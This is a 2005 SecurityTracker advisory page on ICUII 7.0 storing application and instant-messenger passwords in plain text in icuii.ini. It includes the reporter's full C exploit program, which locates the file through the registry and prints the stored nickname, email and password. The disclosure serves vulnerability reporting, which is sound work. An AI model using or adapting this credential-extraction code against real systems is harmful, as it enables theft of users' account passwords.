SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   ICUII Vendors:   Cybration
ICUII Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013828
SecurityTracker URL:  http://securitytracker.com/id/1013828
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 28 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 7.0
Description:   Kozan reported a vulnerabiliy in ICUII. A local user can obtain passwords.

The software stores the application password and instant messenger application passwords in the '\\Program Files\icuii\icuii.ini' file in plain text format. A local user can view the passwords in the file.

The file may contain MSN, Yahoo, AIM, and ICQ user passwords.

Impact:   A local user can obtain passwords for the application and for related instant messaging applications.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.icuii.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  ICUII 7.0 discloses passwords to local users.


---------------------
Application:
---------------------

ICUII 7.0

---------------------
Introduction:
---------------------

Vendor: Cybration - www.icuii.com

Vendor Description: CUII is a full-color IP-based videoconferencing system.
ICUII includes a Quick Message function that can send audio, text, and/or
a video image to any user on the directory, or to your Pal list. Other
features include visual caller ID, a 'do not disturb' option, a buddy list,
picture e-mail, user profiles with pictures, a 320x240-pixel viewing screen,
content filters, and global listings, Instant Message forwarding of new and
saved Instant messages. Home and office routers and intranets can use ICUII
on all machines. PAL authorization that lets you decide who adds you to their
pal list and lets you remove yourself from unwanted pals. ICUII has all in one
instant messaging from the 4 most popular programs. AIM, ICQ, MSN, and, Yahoo
are integrated into one system. Version 7.0 includes a Flash based text chat
system where you and your friends can have group text chat if video calls
and messages are not an option.

---------------------
Bug:
---------------------

ICUII 7.0 stores all the passwords in "\\Program Files\icuii\icuii.ini" file
in plain text format without crypting and can be viewed by a local user.


"icuii.ini" password storing algorithm:

[UserInfo]
NickName=icuii_nick
Location=icuii_location
Comment=icuii_comment
Email=icuii_user_mail_address

[PWFilters]
StartingPW=icuii_password

[ICQ]
Name=icq_number
Other=icq_password

[AIM]
Name=aim_account
Other=aim_password

[MSN]
Name=msn_account
Other=msn_password

[Yah]
Name=yahoo_account
Other=yahoo_password

---------------------
Vendor Confirmed:
---------------------

No.

---------------------
Fix:
---------------------

There is no solution at the time of this entry.

---------------------
Exploit:
---------------------


/*****************************************************************

ICUII 7.0 Local Password Disclosure Exploit by Kozan

Application: ICUII 7.0 (and probably prior versions)
Procuder: Cybration - www.icuii.com
Vulnerable Description: ICUII 7.0 discloses passwords to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");

if( di == NULL )
{
fclose(di);
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}


char *oku(char *FilePath,char *Str)
{

FILE *di;
char cr;
int i=0;
char Feature[500];

int Offset = adresal(FilePath,Str);

if( Offset == -1 )
return "";

if( (di=fopen(FilePath,"rb")) == NULL )
return "";

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D)
break;
Feature[i] = cr;
i++;
}

Feature[i] = '\0';
fclose(di);
return Feature;
}

int main()
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
					"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
					0,
					KEY_QUERY_VALUE,
					&hKey
					) == ERROR_SUCCESS)
	{
	lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
	if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
	{
		RegCloseKey(hKey);
		printf("An error occured!\n");
		return -1;
	}
	RegCloseKey(hKey);
	}

	strcat(prgfiles,"\\icuii\\icuii.ini");

	if(oku(prgfiles,"NickName=")=="")
	{
		printf("ICUII is not installed on your system!\n");
		return -1;
	}

	printf("ICUII 7.0 Local Password Disclosure Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com - www.spyinstructors.com\n");
	printf("kozan@netmagister.com\n\n");

	printf("Nickname: %s\n",oku(prgfiles,"NickName="));
	printf("Location: %s\n",oku(prgfiles,"Location="));
	printf("Comment : %s\n",oku(prgfiles,"Comment="));
	printf("E-Mail  : %s\n",oku(prgfiles,"Email="));
	printf("Password: %s\n",oku(prgfiles,"StartingPW="));

	/*
		This example exploit only shows main ICUII passwords.
		You may also get ICQ, AIM, MSN, Yahoo! passwords which are used within ICUII
	*/

	return 0;
}




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC